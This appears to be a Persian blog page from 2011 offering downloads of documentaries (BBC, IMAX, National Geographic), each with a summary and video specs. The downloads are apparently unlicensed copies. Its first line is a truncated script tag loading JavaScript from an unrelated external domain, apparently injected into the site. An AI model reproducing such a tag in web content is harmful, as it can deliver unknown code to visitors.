script type="text/javascript" src="http://7vps.ir/img/website.js"> دانلود فیلم مستند
کافی نت
وبلاگی جذاب

دانلود فیلم مستند ماه BBC The Moon XviD

نوشته شده توسط حمیدرضا در تاریخ جمعه، 10 تیر ماه 1390
 
دانلود فیلم مستند ماه BBC The Moon XviD
فیلم مستند ماه ،برای اولین بار با کیفیت XviD

با مستندی در مورد دنیای فضا و کهکشان در خدمت شما عزیزان هستیم.این مستند در مورد قمر زمین ( ماه ) می باشد.
ماه تنها قمر سیارهٔ زمین است. هنگام شب ، گاهی ماه به صورت کامل و گاهی نیمه در آسمان نمایان است.از گذشته تا کنون انسان به فکر سفر به ماه بوده است.میانگین فاصله ماه تا زمین ۳۸۴٬۴۰۳ کیلومتر و قطر ماه ۳٬۴۷۶ کیلومتر است. کره ماه نزدیکترین جرم آسمانی به زمین محسوب می‌شود. مهتاب نوری ست که از خورشید آمده و از سطح ماه رو به کره زمین بازتابانده شده. نور تقریباً در مدت ۱٫۳ ثانیه فاصله بین زمین تا ماه را طی می‌کند. نشانهٔ نجومی ماه ☾ است.
در سال ۱۹۶۹ سازمان ناسا اعلام کرد که نخستین فضانوردان به نام‌های نیل آرمسترانگ و باز آلدرین در قالب پروژه آپولو بر سطح ماه فرود آمدند.
نیم‌کره‌ای از ماه به طور دائمی رو به زمین قرار دارد که سمت پیدای ماه نامیده می‌شود. نیمه پنهان ماه را سمت پنهان ماه می‌نامند. ماه هر سال ۲ سانتیمتر از زمین دور می‌شود
بر خلاف زمین، ماه نه دارای آب است، نه هواکره، نه زندگی و نه میدان مغناطیسی. نمی‌توان گفت که ماه کاملاً غیر فعال است، زیرا «ماه لرزه» را باید نشانه‌ای از وجود نوعی حرکت در درون آن دانست. قطعاً ماه در دوران گذشته، آتشفشانهایی داشته است؛ اما غالب حفره‌هایی را که در آن می‌بینیم، نتیجه اصابت سنگهای آسمانی در اولین روزهای شکلگیری آن است. بعضی از این حفره‌ها عظیم اند عمق حفره نیوتون ۸٬۰۰۰ متر است. هنگامی که سفینه فضایی شوروی به نام لونا ۳ از پشت ماه عکس گرفت، دانشمندان دیدند که روی پنهان ماه درست مانند روی آشکار آن نیست. در آنجا، تعداد حفره‌ها بسیار بیشتر بود؛ اما به طور کلی، از حفره‌های روی آشنای ماه کوچک‌تر بودند.
در این مستند درباره موضوع تسلط انسان ها بر ماه صحبت شده است که به زودی در آینده جنگی بزرگ ، برای تسلط بر ماه و زندگی در آن بین انسان ها رخ خواهد داد

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

فیلم آموزشی یوگا Sri Sri Yoga DVD

نوشته شده توسط حمیدرضا در تاریخ سه شنبه، 14 تیر ماه 1390
فیلم آموزشی یوگا Sri Sri Yoga DVD
فیلم آموزشی یوگا برای اولین بار با فرمت DVD
با یک فیلم آموزشی یوگا، درخدمت علاقه مندان به این رشته ورزشی هستیم..در این فیلم آموزشی شما تمرینات مناسبی فرا خواهید گرفت.این تمرینات برای همه مناسب می باشد و حتی به صورت انفرادی و گروهی نیز قابل انجام دادن هستند.
یوگا ورزشی جسمی و روانی(فکری) می‌باشد که در شبه قارهٔ هند و توسط هندوها بوجود آمده‌است.ریشه یابی دقیق این ورزش که توسط چه شخصی و دقیقآ چگونه بوجود آمده کمابیش ناممکن است چرا که تاریخ شکل گیری یوگا به سالهای بسیار دور برمی گردد.یوگا از طرفی به معنای «کنترل کردن» آمده‌است و در آن صورت یوگا را می‌توان علم کنترل امواج فکر و علم مهار قوای ذهن به منظور تسلطی همه جانبه بر توان بالقوة خود دانست. در این صورت به «روش» این دانش که همانا کنترل قوای تن و فکر است تأکید می‌شود. با توجه به چنین درکی، یوگا، در کتاب شاندیلیوپانیشاد (Shandilyopanishad)، این گونه تعریف شده‌است: «یوگا عبارت از کنترل امواج ذهنی است.» از طرف دیگر می‌توان یوگا را به معنای نظاره کردن و دیدن، در نظر گرفت که در نتیجه یوگا علم نظارة خود و خودشناسی است. بدین ترتیب غایت این دانش آشکار می‌شود. یعنی واقع شدن در طبیعت اصیل خویش و شکافتن تمامی حجابهای نفسانی. بر همین اساس در باگاواد گیتا (Bhagavad gita) اوج یوگا، رویت ذات درونی از طریق ذهن پاک و خالص شده توصیف شده‌است، و سرانجام یوگا را به معنی «وصل و یکی شدن» نیز ترجمه کرده‌اند که در آن صورت غرض از انجام تمرینات یوگا آشکار و هویدا می‌شود. به این معنا، یوگا عبارت است از عملکرد هماهنگ قوای فردی و اتحاد قوای ذهنی (Chitta shakti) با قوای حیاتی تن و حواس (Prana shakti) که منجر به تلخیص انرژی، توسعة آگاهی و در نهایت اتحاد با آگاهی متعال خواهد شد. بنابر این تصور، در رودرایا مالاتانترا (Rudrayamatantra) گفته شده : «یک یوگی، فقط در اتحاد با آگاهی متعال، به تجربة یوگا نایل می‌گردد.» بدین ترتیب هر کدام از معانی واژة یوگا، قسمتی از این معرفت عمیق باطنی را آشکار می‌سازد و اختلاف ذاتی در میان آنها دیده نمی‌شود. یک واژه سانسکریت است .

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود مستند National Geographic Hooked Carp Invasion

نوشته شده توسط سعید در تاریخ شنبه، 11 تیر ماه 1390

http://mihandownload.com/mypic/Saeed/hooked-carp-invasion.jpg

National Geographic - Hooked: Carp Invasion (2011) HDTV XviD-DiVERGE
Language: English
00:44:54 | 624x352 | XviD - 952Kbps | 29.970fps | MP3 - 128Kbps | 349MB
Genre: Documentary

نام مستند:  Hooked Carp Invasion - گرفتار تهاجم کپورها
سال انتشار: ۲۰۱۱
زبان: انگلیسی
مدت زمان: ۴۵ دقیقه
حجم: ۳5۰ مگابایت
کیفیت: HDTVRip
زیرنویس انگلیسی : ندارد
خلاصه داستان : کپورهای آسیایی به سمت راه های آبی امریکا حرکت کرده اند ، با اشتهایی باورنکردنی در خوردن همه چیز که باعث به هم ریختن اکوسیستم و میل آن به نابودی شده است.در این مستند به داخل آب هایی که این کپورها زندگی می کنند می رویم تا با روش زندگی آن ها آشنا شویم و ...
این ماهی از خانواده است که دارای ۲ جفت سبیلک، ودندان‌های حلقی با فرمول ۳٫۱.۱-۱٫۱.۳ یا ۳٫۲.۱-۱٫۲.۳ می‌باشد. کپور معمولی فلس‌هایی درشت و باله پشتی ممتدی دارد. تعداد فلس‌های خط جانبی در این ماهی ۳۲-۳۰ عدد می‌باشد. دهان آن کشویی بوده و قابل بیرون زدن است. کپور معمولی در حوضه‌های دریای خزر، رودخانه تجن و تمام حوضه‌های آبریز ایران پراکنش دارد. حداکثر طول در این ماهی ۱۵۰ و میانگین ۳۸ سانتی متر است. بدن این ماهی تا حدی دراز است و طول ۳ برابر ارتفاع می‌باشد. سر ماهی بزرگ و پوزه کند است. باله مخرجی کوتاهی دارد. در باله پشتی ۳ تا ۴ خار سخت و ۱۵(۱۶) تا ۲۱(۲۲) شعاع نرم و شاخه شاخه وجود دارد. در باله مخرجی نیز ۳ خار سخت و ۵ یا ۶ شعاع نرم شاخه شاخه دیده می‌شود.
این ماهی همه چیز خوار بوده و از موجودات ریز بستر آب، کرم‌ها، سخت‌پوستان، نوزاد حشرات و حتی فضولات حیوانی و گیاهی، لاشه حیوانات، تخم ماهیان و حتی نوزادان خود را مصرف می‌کنند.
در دمای کمتر از ۷ درجه سانتی‌گراد به صورت دسته جمعی به خواب زمستانی فرو می‌روند. در آب شیرین به سر برده و آب‌های گرم، آرام و پوشیده از گیاه را دوست دارد.
در میان کپور ماهیان می‌توان ۴ نوع آن را بر حسب قرار گرفتن فلس‌ها بر روی بدن از یکدیگر تشخیص داد: ۱)کپور فلس‌دار: که دارای بدنی کاملا پوشیده از فلس است. ۲) کپور آئینه‌ای: که دارای فلس‌های آئینه‌ای شکل و نا مرتب است. ۳)کپور فلس یک ردیفی: که دارای یک ردیف فلس در امتداد خط جانبی بوده و همگی آنها به یک اندازه‌اند. ۴) کپور چرمی یا برهنه: که فاقد فلس و یا دارای تعداد کمی فلس است. عمر این ماهی تا 45-50 سال گزارش شده و نمونه های از آن تا 30 کیلوگرم وزن می توانند داشته باشند
گونه‌های پرورش‌داده‌شده و رنگارنگ به نام کپور گلگون (کوی) معروفند.

برای دانلود به ادامه مطلب مراجعه نمایید...
 
ادامه مطلب+Download


دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip

نوشته شده توسط حمیدرضا در تاریخ دوشنبه، 13 تیر ماه 1390
 
 دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip
مستند زندانی های کاترینا برای اولین بار با کیفیت DVDrip

مستندی دیدنی برای شما عزیزان آماده کرده ایم..این مستند که زندانی های کاترینا نام دارد ، در مورد هزارنفر از زندانیان نارنجی پوش کاترینا می باشد .زندانی هایی که شامل جنایتکاران و قاتلان خطرناکیست ، که از زندان فرار کرده و بر روی یک پل شکسته ، تحت کنترل نگهبانان زندان جمع می شوند و بعد از آن توفند کاترینا رخ می دهد.اما آن زندانیان چه کسانی بودند؟ در زندان چه بر سر آنان آمده بود؟ کلانتر از شهردار New Orleans خواسته بود تا موضوع را در دست بگیرد.وی تصمیمی گرفت و اعلام کرد : زندانیان در جایی که به آنان تعلق دارند خواهند ماند.
این یک داستان نگفته در مورد حدود 7000 زندانی است که در زندان Orleans Parish زندانی بوده اند و دچار آب گرفتگی در زیر پل شکسته شده اند.یک سال بعد از توفند، مشخص شد که زندانیان در زندان بدون آب و غذا رها شده بودند ، که باعث خشم  و ترس آنان شده بود.
توفند کاترینا  یکی از فاجعه‌بارترین بلایای طبیعی در ایالات متحده آمریکا بوده است.
این توفند که در سال ۲۰۰۵ میلادی رخ داد بخشی از کرانه‌های آمریکایی خلیج مکزیک از نیواورلئان در ایالت لوئیزیانا تا موبایل در ایالت آلاباما را درنوردید و به ویرانی کشید.
توفان کاترینا در پگاه ۲۹ اوت ۲۰۰۵ از دریا به خشکی رسید و باعث مرگ ۱،۸۳۶ تن و آوارگی یک میلیون نفر شد. چنین فاجعه‌ای انسانی از زمان جنگ داخلی آمریکا در ایالات متحده دیده نشده است.
توفَند یا تندباد دریایی  به یک سیستم جوی به شدت متلاطم گویند که مشخصه آن یک مرکز کم فشار است که همراه با بارندگی شدید توام با بادهای با سرعت و سیلاب است.
مشخصات کیفیت این مستند به شرح زیر می باشد:
English | 59 Min | 640 x 368 | x264 - 128Kbps | 25.000fps | MP3 - 109Kbps | 460 MB

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download
 

دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p

نوشته شده توسط حمیدرضا در تاریخ جمعه، 10 تیر ماه 1390
دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs
مستند مومیایی ها ، رازهایی از فراعنه برای اولین بار با کیفیت BluRay 1440p

با مستندی در مورد مومیایی های مصر باستان در خدمت شما عزیزان هستیم
در این مستند، سرنخ های موجود در مصر باستان، که توسط دانشمندان و کاشفان جمع شده است ، به یکدیگر متصل شده و به شناسایی مومیایی های مصر ختم می شود.این آثار از گذشته، یک پنجره جدید بر دنیای مرموز فراعنه باز می کند.علاوه بر درک ما از فرهنگ ، مذهب، و زندگی روزانه هزاران سال پیش ، دانشمندان به بازسازی DNA مومیایی ها و افشای رازهای ژنتیک هزاران سال پیش پرداخته اند ، تا بتوانند پیشرفت های در زمینه علم پزشکی فراهم آورند.بازکردن اسرار فراعنه ، شاید نگاهی به آینده تمدن ما باشد
مومیایی به جسدی گفته می‌شود که پوست و گوشت خشک شده آن در اثر تماس عمدی یا تصادفی با مواد شیمیایی، سرمای فوق‌العاده زیاد، رطوبت بسیار پایین یا عدم وجود هوا حفظ شده‌است.
کیفیت این مستند به شرح زیر می باشد:
English | 00:38:41 | AVC1 | 1280x1440 | 23.97fps 6661 Kbps | AC3 448 Kbps 48.0khz | 2.56GB

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

 

دانلود مستند IMAX India Kingdom of the Tiger

نوشته شده توسط سعید در تاریخ جمعه، 10 تیر ماه 1390

http://mihandownload.com/mypic/Saeed/India%20Kingdom%20of%20the%20Tiger.jpg

IMAX - India Kingdom Of The Tiger (2011) 720p HDTV x264-HILSWALTB
Language: English
00:37:53 | 1280x720 | x264 - 3745Kbps | 23.976fps | AC3 - 384Kbps | 1.09GB
Genre: Documentary

نام مستند:  India: Kingdom of the Tiger - هندوستان : پادشاهی ببر
سال انتشار: ۲۰۱۱
زبان: انگلیسی
مدت زمان: ۳۷ دقیقه
حجم: 10۰۰ مگابایت
کیفیت: 720P
زیرنویس انگلیسی : ندارد
خلاصه داستان : حیوان ملی کشور هند ، ببر بنگال ، در این مستند به طور دقیق و منحصر به فردی مورد بررسی قرار می گیرد. بر اساس زندگی نویسنده و حامی محیط زیست ، Jim Corbett ، در این برنامه دلیل اینکه چگونه این ببرها گونه هایی بی آزار در بین ببرها شده اند . با آن ها چه رفتاری صورت گرفته که به این صورت درآمده اند و ...
توضیحات : هند یا هندوستان با نام رسمی جمهوری هند (هندی: भारत गणराज्य؛ تلفظ: بْهَارَتْ گَنَرَاجْیَه) کشوری در جنوب آسیا است که پایتخت آن دهلی نو است. هندوستان از شمال باختری با پاکستان؛ از شمال با چین، بوتان، نپال و تبت؛ و از شمال خاوری با برمه و بنگلادش همسایه‌است. همچنین هند از باختر با دریای عرب، از خاور با خلیج بنگال، و از جنوب نیز با اقیانوس هند مرز آبی دارد.
پهناوری هندوستان ۳٬۴۰۲٬۸۷۳ کیلومتر مربع (هفتم در جهان، ۲ برابر ایران) است. بیشتر سرزمین هندوستان پست و هموار است و رشته‌کوه هیمالیا که در شمال کشور قرار دارد باعث شده‌است که رطوبت و ابرهای باران‌زا به شمال آسیا نفوذ نکند و در نتیجه هند کشوری پرباران و مرطوب و دارای خاک بسیار حاصلخیز است. این موضوع باعث شده‌است که این کشور بتواند جمعیت بسیاری را در خود جای دهد.
جمعیت هندوستان حدود ۱٬۱۴۸ میلیون نفر(براورد 2009) است که دومین کشور پر جمعیت دنیا پس از چین به شمار می‌آید. بندر بمبئی (مومبائی) با جمعیتی نزدیک به ۱۴ میلیون تن، پرجمعیت‌ترین شهر هند است. هند بیش از سی و پنج شهر بزرگ با جمعیت بالای یک میلیون تن دارد. بمبئی (مومبائی)، دهلی، کلکته، مدرس، بنگلور، حیدرآباد، اگرا، میسور، جی‌پور، گوا، پونا، بوپال، تریواندروم، سورات، کانپور و احمدآباد از شهرهای مهم این کشور پهناور هستند.
هندوستان دارای تاریخ و فرهنگ بسیار کهن و پرباری است که به ۳۰۰۰ سال پیش از میلاد می‌رسد. هندوستان سرزمین نژادها، زبان‌ها، آیین‌ها، و فرهنگ‌های فراوان و گوناگون می‌باشد. در هند صدها زبان و هزاران گویش و لهجه وجود دارد. علاوه بر دو زبان هندی و انگلیسی که در قانون اساسی این کشور زبان رسمی اعلام شده‌است. ۲۲ زبان دیگر در یک یا چند ایالت موقعیت زبان رسمی را دارند.
طی ۸۰۰ سال تسلط فارسی‌زبانان یا ایرانیان بر هند، این کشور از فرهنگ ایران و زبان فارسی تاثیر بسیاری پذیرفته‌است. زبان فارسی در دورهٔ غزنویان به هند راه یافت و با تأسیس سلسله گورکانیان هند زبان رسمی شد. زبان فارسی هندوستان شاعران بزرگی همچون بیدل دهلوی، و امیر خسرو دهلوی و دستگاه شعری سبک هندی را در خود پروراند. زبان فارسی تاثیر فراوانی بر زبان‌های هندوستان به‌ویژه زبان اردو گذاشته‌است. زبان فارسی پیش از آنکه هندوستان مستعمره انگلستان شود (سده ۱۹ میلادی)، دومین زبان رسمی این کشور و زبان فرهنگی و علمی به‌شمار می‌رفت.

برای دانلود به ادامه مطلب مراجعه نمایید...
 
ادامه مطلب+Download

دانلود فیلم مستند موج بی نهایت تاهیتی IMAX The Ultimate Wave Tahiti 720p BluRay

نوشته شده توسط حمیدرضا در تاریخ چهارشنبه، 8 تیر ماه 1390
 
 دانلود فیلم مستند موج بی نهایت تاهیتی IMAX The Ultimate Wave Tahiti 720p BluRay
مستند موج بی نهایت تاهیتی برای اولین بار با کیفیت BluRay 720p

با مستندی زیبا در مورد امواج زیبای جزیره تاهیتی در خدمت علاقه مندان به موج سواری هستیم.در این مستند به جزیره تاهیتی سفر می کنید.جزیره ای زیبا که بهترین و کامل ترین مسابقات موج سواری در آن انجام می گردد.موج سواران معروف دنیا از جمله Kelly Slater ، Tahitian Surfer ، Raimana Van Bastolaer و دوستانشان بهترین موج سواری های خود را در امواج این جزیره انجام داده اند.در این مستند نیز به ماهیت ایجاد موج های عظیم و مرتفع این جزیره پی خواهید برد.بررسی کوهستانی تاهیتی ، حاکی از آتشفشانی بودن این جزیره دارد. گشت و گذار در این جزیره یکی از به یادماندنی ترین گشت و گذارها در این سیاره زیبای خداوند خواهد بود.
تاهیتی بزرگ‌ترین جزیرهٔ در گروه‌جزیرهٔ پولینزی فرانسه از سرزمین‌های ماوراء بحار فرانسه است که در جزایر سوسایتی در اقیانوس آرام قرار دارد. تاهیتی بر اثر فعالیت‌های آتشفشانی ایجاد شده و جزیره‌ای مرتفع و کوهستانی است که تپه‌های مرجانی آن را فرا گرفته‌اند. تاهیتی مرکز سیاسی، اقتصادی و فرهنگی پولینزی فرانسه است و جمعیت آن در سرشماری سال ۲۰۰۷ بالغ بر ۱۷۸٬۱۳۳ بود که آن را پرجمعیت‌ترین جزیرهٔ پولینزی فرانسه با ۶۸.۶٪ کل جمعیت منطقه می سازد. مساحت تاهیتی ۱٬۰۴۷ کیلومتر مربع است.
پایتخت تاهیتی و پولینزی فرانسه شهر پاپیته در شاحل شمال غربی جزیره است که تنها فرودگاه بین‌المللی منطقه در آن جای دارد. نخستین آدمیان ساکن این جزیره پولینزیایی‌ها هستند که بین سال‌های ۳۰۰ تا ۸۰۰ میلادی از فیجی، ساموآ یا تونگا به آن وارد شدند. هم‌اکنون حدود ۷۰٪ جمعیت تاهیتی را پولینزی‌ها تشکیل می‌دهند و بقیه اروپایی، چینی و چندرگه هستند. تاهیتی از سال ۱۸۸۰ مستعمرهٔ فرانسه شد و در ۱۹۴۶ بخشی از کشور فرانسه گردید و بومیان آن شهروندان قانونی فرانسه شدند.
کیفیت مستند به شرح زیر می باشد:
Language: English
45 mins | BluRay 720p | mkv | 1280 x 720 | x264 @ 6744 kbps | DTS @ 1510 kbps | 2.71 GB

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود فیلم مستند جزایر گالاپاگوس IMAX Galapagos 2011 BluRay 720p

نوشته شده توسط حمیدرضا در تاریخ چهارشنبه، 8 تیر ماه 1390
 
دانلود فیلم مستند جزایر گالاپاگوس IMAX Galapagos 2011 BluRay 720p

مستند جزایر گالاپاگوس برای اولین بار با کیفیت BluRay

با مستندی زیبا در مورد جزیره های زیبای گالاپاگوس در خدمت شما عزیزان هستیم.در این مستند یک زیست شناس دریایی از موزه ملی موسسه اسمیتسونیان به جزایر گالاپاگوس سفر می کند.جزایری که هنوز دنیای عجیبی در آنها حاکم است.در این مستند به عمق 3000پا نفوذ خواهید کرد و قدرت خداوند را از آفرینش این جزایر بیش از پیش خواهید شناخت
گالاپاگوس  گروه-جزیره‌ای آتشفشانی است در ۹۷۲ کیلومتری اکوادور در اقیانوس آرام.
گالاپاگوس با جمعیت حدود ۴۰٬۰۰۰ نفری خود یکی از استان‌های اکوادور به شمار می‌آید. زبان اصلی مردمان ساکن در این جزیره‌ها اسپانیایی است.
شهرت این جزیره‌ها در وجود شمار زیادی از گونه‌های نایاب جانوری و نیز مسافرت چارلز داروین به آن‌ها و نقش مطالعات وی در این جزیره‌ها در ارایه نظریه تکامل است.
این جزیره‌ها به عنوان یکی از میراث جهانی توسط سازمان یونسکو انتخاب شده‌اند.
پنج عدد از این جزیره‌ها نسبتاً بزرگ و در بین خط استوا و ۱ درجه از عرض جنوبی جای گرفته‌اند و سه تای دیگر از آن‌ها کوچک و در جنوب درجه ۱ و دو قطعه آن‌ها در شمال خط استوا قرار گرفته‌اند، بقیه خیلی کوچک و برخی تخته سنگ‌هایی بیش نیستند، این جزیره‌ها در فواصل زیاد از یکدیگر و در یک حال پراکنده‌اند.
نام جزیره‌ها
۱. آلیمارله
۲. ایندفاتیگابل
۳. ناربوروگ
۴. گامس سانتیاگو
۵. چاتهام
۶. کلوریانه
۷. یک جزیرهٔ کوچک دیگر

کیفیت مستند به شرح زیر می باشد:
Language: English 00:37:08 | 1280x720 | x264 - 3828Kbps | 23.976fps | AC3 - 384Kbps | 1.09GB

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود فیلم مستند شیرها بد رفتار می کنند Lions Behaving Badly BluRay 720p

نوشته شده توسط حمیدرضا در تاریخ چهارشنبه، 25 خرداد ماه 1390

دانلود فیلم مستند شیرهای بد رفتار Lions Behaving Badly BluRay 720p
دانلود مستند Lions Behaving Badly برای اولین بار با کیفیت BluRay 720p

این مستند به درخواست بازدیدکننده محترم ( مهدی عزیز ) برای شما آماده شده است

برای آموزش تصویری تغییر دادن زبان فیلم با استفاده از PowerDVD بر روی لینک زیر کلیک نمایید

آموزش تصویری

امروز با یک مستند از حیات وحش در خدمت شما عزیزان هستیم.همه شما سلطان حیوانات ، شیر را می شناسید.این مستند در مورد زندگی این حیوانات قوی و درنده می باشد.
این شکارچیان بزرگ ، می توانند به دقت سرعت خود را برای گرفتن شکار خود محاسبه کنند و شکار خود را با خفه کردن از پا دراورند.آیا این تصور که شیر ها سلطان جانوران هستند و در داستان ها همیشه به پادشاه جنگل از آنها یاد می شود  واقیعت دارد>
شیرها گاهی اوقات بسته به میزان درنده بودنشان دندان های تیز خود را در درون گوشت قربانی خود که در حال جان دادن است فرو می برند
در این مستند با بچه شیر ها نیز روبه رو خواهیم شد.آیا این بچه ها نیز همانند پدر و مادر خود درنده بودن و سلطان حیوانات بودن را به ارث خواهند برد؟
حال به توضیحاتی از شیر توجه نمایید:
شیر جانوری نیرومند با سری بزرگ، پاهای بزرگ و قوی و دمی بلند از جنس پلنگ‌شکلان (Panthera) است. اندازهٔ بدن او ۱۴۰ تا ۲۰۰ سانتیمتر و اندازهٔ دم او ۶۷ تا ۱۰۰ سانتیمتر است. نوع نر بزرگ‌تر از ماده‌است و نرها بر روی گردن و شانهٔ خود دارای یال نیز می‌باشند. رنگ بدن شیرها بین قهوه‌ای مایل به زرد و قهوه‌ای مایل به سرخ متغیّر است. رنگ یال شیرهای نر نیز از زرد روشن تا سیاه متغیّر است. همچون دیگر گربه‌سانان بزرگ شیرها نیز می‌توانند به سرعت‌های بالا دست یابند و آن را برای مدّت کوتاهی حفظ کنند. در گذشته در آفریقا، خاورمیانه و جنوب آسیا به فراوانی یافت می‌شدند ولی اکنون فقط در جنوب صحرای بزرگ در آفریقا و در منطقهٔ حفاظت‌شده‌ای در شمال غربی هند زندگی می‌کنند. شیر برخلاف مشهور بودن به سلطان جنگل در بیشه‌ها زندگی می‌کند. این جانور ۲۰ ساعت در روز به استراحت می‌پردازند. شیرها معمولاً در طول روز به شکار می‌پردازند ولی در مناطقی که آنها را شکار می‌کنند تنها در شب فعّال هستند. آنها گروهی زندگی می‌کنند و هر گروه متشکّل از سه شیر نر، پانزده ماده و توله‌هایشان در یک قلمرو مشخّص است. گروه‌های دیگری نیز هستند که تنها از شیرهای نر مجّرد تشکیل شده‌اند. شیرها جانورانی مانند گورخر و غزال را برای تغذیه شکار می‌کنند. آنها جانوران بزرگ‌تر مانند بوفالوها و زرّافه‌ها را نیز به صورت دست جمعی و به کمک یکدیگر شکار می‌کنند. حتّی پرندگان و گاهی کروکدیلها نیز به دست آنها گرفتار می‌شوند. شکارکردن بیشتر به عهدهٔ شیرهای ماده‌است.
مشخصات کیفیت به شرح زیر می باشد:
Container: mkv
Quality: HDTVRip
Video: MPEG-4 AVC, 2883 Kbps, 1280x720
Sound: Russian (AC3, 2 ch, 128 Kbps), English (AC3, 2 ch, 192 kbit / s)

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود فیلم مستند پرتاب شاتل فضایی اس تی اس Space Shuttle STS 118 HD

نوشته شده توسط حمیدرضا در تاریخ دوشنبه، 30 خرداد ماه 1390
 
دانلود فیلم مستند پرتاب شاتل فضایی اس تی اس Space Shuttle STS 118 HD
مستند Space Shuttle STS 118 برای اولین بار با کیفیت HD

امروز با یک مستند دیدنی در خدمت شما علاقه مندان به فضا هستیم.این مستند که Space Shuttle STS 118 Lunch نام دارد ، در مورد پرتاب شاتل فضایی STS 118 می باشد.
این فضاپیما از سکوی 39A واقع در مرکز فضایی Kennedy در فلوریدای آمریکا در تاریخ 8 آگوست 2007 و در ساعت 18:36 به وقت محلی به فضا پرتاب شد.STS 118 ، 22 ماموریت در مورد ایستگاه فضایی بین المللی ISSخواهد داشت و ادامه ساختن پایه ایستگاه فضایی را انجام خواهد داد .
ISS یک تلاش مشترک بین چندین سازمان فضایی ملی ، از جمله ناسا می باشد.این ایستگاه  در ارتفاع 350 کیلومتری به دور زمین می چرخد.
به توضیحات بیشتری در مورد شاتل فضایی توجه نمایید
شاتل فضایی آمریکا که اولین بار در سال ۱۹۸۱ پرتاب شد. نخستین سفینه قابل استفاده مجدد جهان بود. سه بخش اصلی آن مدارپیما، موشکهای تقویت کننده، و مخزن بیرونی سوخت (تنها مخزن سوخت آن که بعد از هر مأموریت قابل استفاده نیست) می‌باشد. کاشی‌های ویژه مقاوم در برابر گرما مانع از سوختن مدارپیما به هنگام بازگشت به جو زمین می‌شوند. بازوی قابل کنترل از راه دور تعبیه شده در مخزن محموله مدارپیما، می‌تواند ماهواره‌ها را در فضا قرار دهد؛ و همچون سکویی ثابت برای کار فضانوردان عمل کند.
پس از فضاپیماهای مرکوری، جمینی و آپولو (که ماه را فتح کرد)، آمریکایی‌ها به سراغ سفینه‌های رفت و برگشتی رفتند و بدین سان، شا.تل‌های فضایی متولد شدند. شا.تل‌ها تا ۷ مسافر و ۲۵ تن تجهیزات را در خود جای می‌دهند و زمان طولانی‌تری را در مدار زمین به سر می‌برند. آن‌ها همچنین به یک بازوی روباتیک مجهز هستند که به کمک آن می‌توانند ماهواره‌ها را به دام انداخته، اقدامات لازم را در مورد تعمیرات یا انتقال آن صورت دهند.
تاکنون هفت شا.تل به نام‌های انترپرایز، راه یاب (پث فایندر)، کلمبیا، چلنجر، دیسکاوری، آتلانتیس و اِندِور ساخته شده که دو شا.تل نخست، ناکامل و برای آزمایش‌ها و بررسی‌ها ساخته شده‌اند. از میان پنج شا.تل بعدی نیز چلنجر و کلمبیا دچار سانحه شده‌اند و فقط سه شا.تل دیسکاوری، آتلانتیس و اندیور مشغول فعالیت هستند. به دلیل دو سانحه که باعث کشته شدن ۱۴ فضانورد و از دست رفتن ۲ فضاپیمای شا.تل شد، ناسا اعلام کرده که ناوگان شا.تل را تا سال ۲۰۱۰ میلادی بازنشست خواهد کرد.
شاتل‌های فضایی بسیار هزینه‌بر هستند، به طوری که پرتاب آن فقط پانصد میلیون دلار هزینه در بر دارد و این، غیر از هزینه‌های نگهداری و تعمیرات آن است. همین هزینه‌های سنگین موجب شد تا روسیه از شا.تل فضایی قدرتمند خود، بوران، استفاده نکند. بوران با قدرت حمل ۳۰ تن تجهیزات، و استفاده از امکانات ناوبری پیشرفته، یک سر و گردن بالاتر از همتای آمریکایی خود است؛ ولی به دلیل هزینه‌های بسیار بالا، روسیه از آن استفاده نکرده است.
کیفیت مستند به شرح زیر می باشد:
English | 00:23:40 | Video : XviD 960x544 29.97 fps 5300 kbs | Audio : AC3 48kHz 384 kbs | 902 MB

برای دیدن تصاویری از مستند و دانلود به ادامه مطلب مراجعه نمایید
 
ادامه مطلب+Download

صفحات سایت

 1  |  2  |  3  |  4  |  5  |  6  |  7  |  8  |  9  |  10  |  11  |  12  |  13  |  14  |  15  |  16 



سه شنبه 21 تير 1390برچسب:فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند ماه BBC The Moon XviD,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند ماه BBC The Moon XviD,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند ماه BBC The Moon XviD,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند ماه BBC The Moon XviD,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فيلم مستند اموزشي,دانلود فيلم با لينك مستقيم,دانلود فیلم فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فیلم خارجی فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود مستند,دانلود مستند,فيلم مستند,فيلم اموزشي,اموزش تصويري,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم اموزشي,دانلود مستقيم فيلم اموزشي,دانلود مستند National Geographic Hooked Carp 